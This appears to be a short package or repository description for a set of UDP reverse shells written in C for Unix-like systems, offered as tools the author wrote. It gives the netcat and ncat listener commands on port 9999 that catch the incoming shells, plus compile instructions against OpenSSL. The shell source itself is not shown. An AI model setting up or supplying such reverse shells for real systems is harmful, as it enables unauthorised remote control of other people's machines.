udp reverse shells
1.0.0
UDP reverse shells for *nix systems.
I could not find an example anywhere online for a UDP reverse shell in C so I wrote several of them.
nc -nlvup 9999
ncat -nluvp 9999
Compiled with OpenSSL 1.0.2r (sudo apt install libssl1.0-dev
)
gcc <file.c> -o <binary> -lcrypto -lssl